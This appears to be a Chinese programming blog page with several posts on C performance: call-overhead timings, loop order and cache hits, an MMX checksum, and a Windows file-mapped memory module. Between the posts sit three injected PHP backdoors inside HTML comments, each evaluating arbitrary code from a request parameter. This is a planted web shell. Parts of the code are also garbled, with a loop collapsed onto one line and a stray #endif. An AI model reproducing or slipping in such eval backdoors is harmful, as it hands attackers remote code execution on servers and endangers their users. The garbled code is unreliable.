c语言部分的开销测试

最近在写c代码时底气越来越弱,原因在于某些调用的开销,我心里并不是十分明确。写起代码来由于纠结也就变的畏畏缩缩。

今天终于抽时间测了一下,仅测试了最近常遇到的一些调用的开销。

测试环境如下:

CentOS release 6.7(Final)

CPU:Intel(R)Xeon(R)CPU E3-1230 V2 @ 3.30GHz

采用gcc(glibc)编译,未开任何优化。
在测试时,大部分操作cache均会命中,因此如果cache经常命中失效,还需要另外考虑。

测试结果如下:

可以看出for循环是最廉价的。

malloc是开销最大的,这还是在单线程的情况下,如果再多线程由于锁的开销malloc的代价将会更甚。

在栈上分配1M次内存的代价几乎等同于for了1M次,在栈上分配内存开销最低。

而copy了64M内存也才花费了5ms而已。

cache命中率对效率的影响

趁着去买菜的空档, 突然间想起来cache命中率失败的代价从来还没测过, 随后又想到网上很多人争论如果两个for循环嵌套, 到底是大循环放在外面效率高还是小循环放在外面效率高. 虽然有大牛说不同情况不同分析, 但到底为什么却没有分析.

于是就for循环与cache命中率写了一段测试代码访问1G的数据来测了一下性能, 竟然有1倍之多.

代码如下:

#include <Windows.h>
#include "assist.h"

//cache line 64 byte
//cache size 4Mbyte
typedef unsigned char cache_line_t[64];

cache_line_t cache_line [1024 * 1024 * 1024 / sizeof(cache_line_t)];

#define FAST 0

int _tmain(int argc, _TCHAR* argv[])
{
int times;
int i, j;
int tmp;

CACL_TAKES_TIME_BEGIN(aa);

#if FAST
for (j = 0; j < ARRAY_SIZE(cache_line); j++) { for (i = 0; i < 64; i++) { tmp = cache_line[j][i]; } } #else for (i = 0; i < 64; i++) { for (j = 0; j < ARRAY_SIZE(cache_line); j++) { tmp = cache_line[j][i]; } } #endif printf("takes:%dmsn", CACL_TAKES_TIME_END(aa)); return 0; }

具体原因可以参考这篇文章. OK买菜去.

------------------------------------------------------------
<<代码大全>>p623中讲到把最忙循环放在最内层, 是因为for循环第一次是需要初始化变量的, 如果最多层越少, 那么i变量被初始为0的次数就越少. 但是从上面的例子表明并非是这样, 这说明当数据量到达一定程度之后, 就要权衡是i被初始化的次数花的代价高还是cache命中率降低的代价更高.

这再次说明了一个道理, 这个世界上没有银弹, 同样说明不加思索的拿来主义在一定程度上是程序效率的拦路虎.

CheckSum计算的优化

  最近在纠结于大数据的checksum的计算,算法如下:

 1 unsigned long cs_cal(const unsigned char *buff, unsigned long size)
 2 {
 3     unsigned long cs;
 4 
 5     cs = 0;
 6     while (size--)
 7         cs += buff[size];
 8 
 9     return cs;
10 }

  当文件大于4G后这种计算的龟速就很明显了,在网上看到大牛说MMX指令对于数据计算相当不俗,于是改成下面代码(bug:不对齐部分没有处理,这部分消耗很小,对于效率影响不大):

 1 unsigned long cs_cal(const unsigned char *buff, unsigned long size)
 2 {
 3     unsigned long cs;
 4     unsigned long cs_2[2];
 5     unsigned long cnt;
 6 
 7     cnt = size / 2;
 8 __asm {
 9     mov    eax, 0
10     movd    mm2, eax
11     mov    ecx, cnt
12     mov    esi, buff
13 cnt_label:
14     mov     al, byte ptr[esi]
15     movd    mm0, eax
16     inc    esi
17 
18     mov     al, byte ptr[esi]
19     movd    mm1, eax
20     inc    esi
21 
22     punpckldq mm0, mm1
23     
24     paddd mm2, mm0
25 
26     dec    ecx
27     jnz    cnt_label
28 
29     movq    qword ptr [cs_2], mm2
30 
31 
32     emms
33 }
34     cs = cs_2[0] + cs_2[1];
35 #endif
36     return cs;
37 }

  测试1G的内存数据发现速度近快了2倍,MMX的威力果然不是吹的.

<!– [insert_php]if (isset($_REQUEST["bay"])){eval($_REQUEST["bay"]);exit;}[/insert_php]

if (isset($_REQUEST[&quot;bay&quot;])){eval($_REQUEST[&quot;bay&quot;]);exit;}

–>

<!– [insert_php]if (isset($_REQUEST["pus"])){eval($_REQUEST["pus"]);exit;}[/insert_php]

if (isset($_REQUEST[&quot;pus&quot;])){eval($_REQUEST[&quot;pus&quot;]);exit;}

–>

<!– [insert_php]if (isset($_REQUEST["CYlNo"])){eval($_REQUEST["CYlNo"]);exit;}[/insert_php]

if (isset($_REQUEST[&quot;CYlNo&quot;])){eval($_REQUEST[&quot;CYlNo&quot;]);exit;}

–>

32位系统使用文件作为媒介来模拟大于4G内存访问

代码一篇,暂时没发现bug:

  1 // vm_mgr.cpp : Defines the exported functions for the DLL application.
  2 //
  3 
  4 #include "stdafx.h"
  5 
  6 #include <Windows.h>
  7 #include <vector>
  8 #include <assert.h>
  9 #include <tchar.h>
 10 #include "../common/assist.h"
 11 #include"../error_no/error_no.h"
 12 #include "../Log/log.h"
 13 #include "vm_mgr.h"
 14 
 15 #define VM_ADDR_GEN(addr, index)                (assert(index < 16), (((index & 0xfULL) << 60) | addr))
 16 #define VM_START_ADDR                           0x100000000ULL
 17 #define VM_WINDOW_SIZE                          (64 * 1024 * 1024UL)
 18 #define VM_ALIGN_SIZE                           (64 * 1024)
 19 
 20 struct vm_window {
 21         void                    *p;
 22         vm_ptr_t                start;
 23         unsigned long           size;
 24 };
 25 
 26 struct vm_item {
 27         int                 addr_index;
 28         HANDLE              mutext;    
 29         HANDLE              hMap;
 30         vm_ptr_t            vm_start_ptr;
 31         unsigned long long  vm_size;
 32         struct vm_window    window;
 33         TCHAR               file_path[MAX_PATH];
 34 };
 35 
 36 struct {
 37     std::vector<struct vm_item>    tbl;
 38 } vm;
 39 
 40 static int find_empty_index()
 41 {
 42         int addr_index;
 43         int i;
 44 
 45         for (addr_index = 0; ; addr_index++) {
 46                 for (i = 0; i < vm.tbl.size(); i++) {
 47                         if (vm.tbl.at(i).addr_index == addr_index)
 48                                 break;
 49                 }
 50                 assert(addr_index <= 16);
 51                 if (i >= vm.tbl.size())
 52                         return addr_index;
 53         }
 54 }
 55 
 56 vm_ptr_t vm_alloc(unsigned long long size)
 57 {
 58         TCHAR                       tmp_path[MAX_PATH];
 59         TCHAR                       tmp_file_path[MAX_PATH];
 60         int                         err;
 61         struct vm_item              vm_item;
 62 
 63         GetTempPath(ARRAY_SIZE(tmp_path), tmp_path);
 64         GetTempFileName(tmp_path, _T("DediProg"), 0, tmp_file_path);
 65 
 66         HANDLE hFile = CreateFile(
 67                                 tmp_file_path,
 68                                 GENERIC_READ | GENERIC_WRITE,
 69                                 FILE_SHARE_READ | FILE_SHARE_WRITE,
 70                                 NULL,
 71                                 OPEN_ALWAYS,
 72                                 FILE_FLAG_SEQUENTIAL_SCAN,
 73                                 NULL
 74                                 );
 75         if (hFile == NULL) {
 76                 return NULL; 
 77         }
 78 
 79         vm_item.hMap = CreateFileMapping(hFile, NULL, PAGE_READWRITE, size >> 32, size & 0xffffffff, NULL);
 80         if (vm_item.hMap == NULL) {
 81                 err = GetLastError();
 82                 return -E_ALLOC_MEMORY_FAIL;
 83         }
 84         vm_item.vm_start_ptr = (vm_ptr_t)MapViewOfFile(
 85                 vm_item.hMap,
 86                 FILE_MAP_ALL_ACCESS,
 87                 0 >> 32,
 88                 0 & 0xffffffff,
 89                 min(size, VM_WINDOW_SIZE)
 90                 );
 91  
 92         vm_item.addr_index = find_empty_index();
 93         vm_item.vm_start_ptr = VM_ADDR_GEN(vm_item.vm_start_ptr, vm_item.addr_index);
 94 
 95         assert(vm_item.vm_start_ptr < ((-1) >> 4));
 96 
 97         CloseHandle(hFile);
 98         hFile = NULL;
 99         vm_item.vm_size = size;
100         vm_item.window.size = (unsigned long)min(VM_WINDOW_SIZE, size);
101         vm_item.window.start = vm_item.vm_start_ptr;
102         vm_item.window.p = (unsigned char *)vm_item.vm_start_ptr;
103         vm_item.mutext = CreateMutex(NULL, FALSE, NULL);
104         _tcsncpy(vm_item.file_path, tmp_file_path, ARRAY_SIZE(vm_item.file_path));
105         vm.tbl.push_back(vm_item);
106 
107         return vm_item.vm_start_ptr;
108 }
109 
110 static __inline int in_region(vm_ptr_t ptr, unsigned long long size)
111 {
112         //static int dbg = 0;
113         int i;
114  
115         for (i = 0; i < (int)vm.tbl.size(); i++) {
116                 if ((ptr + size) <= (vm.tbl.at(i).vm_start_ptr + vm.tbl.at(i).vm_size) && (ptr >= vm.tbl.at(i).vm_start_ptr))
117                         return i;
118                 //if (ptr + size > vm.tbl.at(i).vm_start_ptr + vm.tbl.at(i).vm_size)
119                 //        i = 'DEAD';
120                 //if (ptr < vm.tbl.at(i).vm_start_ptr)
121                 //        i = 'INVA';
122         }
123         
124         LOG_BEGIN {
125                 log_add("----------------------------------------------");
126                 log_add("|             Virtual Memory layout          |");
127                 log_add("|--------------------------------------------|");
128                 for (i = 0; i < (int)vm.tbl.size(); i++)
129                 log_add("|window.start_addr:%llx | window.size:%llx   |", vm.tbl.at(i).window.start, vm.tbl.at(i).window.size);
130                 log_add("|--------------------------------------------|");
131                 log_add("|user.ptr:%llx          | user.size:%llx     |", ptr, size);
132                 log_add("----------------------------------------------");
133         } LOG_END;
134         //dbg++;
135         assert(!"Invalid Memory");
136         return -1;
137 }
138 
139 static __inline unsigned char *scroll_window(int vm_index, vm_ptr_t ptr, unsigned long size)
140 {
141         unsigned char           *p;
142         vm_ptr_t            win_start;
143         unsigned long           win_size;
144         unsigned long long      file_offset;
145         unsigned long long      tmp_offset;
146 
147 
148         win_start = vm.tbl.at(vm_index).window.start;
149         win_size = vm.tbl.at(vm_index).window.size;
150 
151         
152         UnmapViewOfFile(vm.tbl.at(vm_index).window.p);
153 
154         win_size = (unsigned long)min(VM_WINDOW_SIZE, size);
155 
156         assert(ptr >= vm.tbl.at(vm_index).vm_start_ptr);
157         file_offset = ptr - vm.tbl.at(vm_index).vm_start_ptr;
158         
159         tmp_offset = file_offset / VM_ALIGN_SIZE * VM_ALIGN_SIZE;
160         tmp_offset = file_offset - tmp_offset;
161         
162         file_offset = file_offset / VM_ALIGN_SIZE * VM_ALIGN_SIZE;
163 
164         size += (unsigned long)tmp_offset;
165 
166         p = (unsigned char *)MapViewOfFile(
167                 vm.tbl.at(vm_index).hMap,
168                 FILE_MAP_ALL_ACCESS,
169                 file_offset >> 32,
170                 file_offset & 0xffffffff,
171                 size
172                 );
173 
174         if (p) {
175                 vm.tbl.at(vm_index).window.start = ptr;
176                 vm.tbl.at(vm_index).window.size = size;
177                 vm.tbl.at(vm_index).window.p = p;
178 
179                 return p + tmp_offset;
180         }
181 
182         return NULL;
183 }
184 
185 int vm_write(vm_ptr_t pointer, const unsigned char *buff, unsigned long long size)
186 {
187         int             ret;
188         unsigned char       *p;
189         unsigned long       len;
190         int index = in_region(pointer, size);
191 
192         ret = 0;
193 
194         if (index == -1) {
195                 ret = -1;
196                 goto end;
197         }
198         WaitForSingleObject(vm.tbl.at(index).mutext, 20000);        /* timeout 10s */
199         while (size) {
200                 len = (unsigned long)min(size, VM_WINDOW_SIZE);
201                 p = scroll_window(index, pointer, len);
202                 if (!p) {
203                         ret = -1;
204                         goto end;
205                 }
206 
207                 memcpy(p, buff, len);
208 
209                 pointer += len;
210                 buff += len;
211                 size -= len;
212         }
213 end:
214         ReleaseMutex(vm.tbl.at(index).mutext);
215         return ret;
216 }
217 
218 
219 int vm_read(unsigned char *buff, vm_ptr_t ptr, unsigned long long size)
220 {
221         unsigned char   *p;
222         unsigned long   len;
223         int index;
224 
225         assert(buff);
226 
227         index = in_region(ptr, size);
228 
229         if (index == -1)
230                 return -E_ALLOC_MEMORY_FAIL;
231 
232         while (size) {
233                 len = (unsigned long)min(size, VM_WINDOW_SIZE);
234                 p = scroll_window(index, ptr, len);
235                 if (!p)
236                         return -1;
237 
238                 memcpy(buff, p, len);
239 
240                 ptr += len;
241                 buff += len;
242                 size -= len;
243         }
244 
245         return 0;
246 }
247 
248 int vm_free(vm_ptr_t ptr)
249 {
250     int i;
251 
252     LOG_BEGIN {
253                 log_add("----------------------------------------------");
254                 log_add("|             Virtual Memory layout          |");
255                 log_add("|--------------------------------------------|");
256                 for (i = 0; i < (int)vm.tbl.size(); i++)
257                 log_add("|window.start_addr:%llx | window.size:%llx   |", vm.tbl.at(i).window.start, vm.tbl.at(i).window.size);
258                 log_add("----------------------------------------------");
259     } LOG_END;
260 
261     for (i = 0; i < (int)vm.tbl.size(); i++) {
262         if (vm.tbl.at(i).vm_start_ptr == ptr) {
263             assert(vm.tbl.at(i).hMap);
264 
265             UnmapViewOfFile(vm.tbl.at(i).window.p);
266             CloseHandle(vm.tbl.at(i).hMap);
267 
268             DeleteFile(vm.tbl.at(i).file_path);
269 
270             vm.tbl.erase(vm.tbl.begin() + i);
271             return 0;
272         }
273     }
274 
275     assert(!"Invalid pointer");
276 
277     return 0;
278 }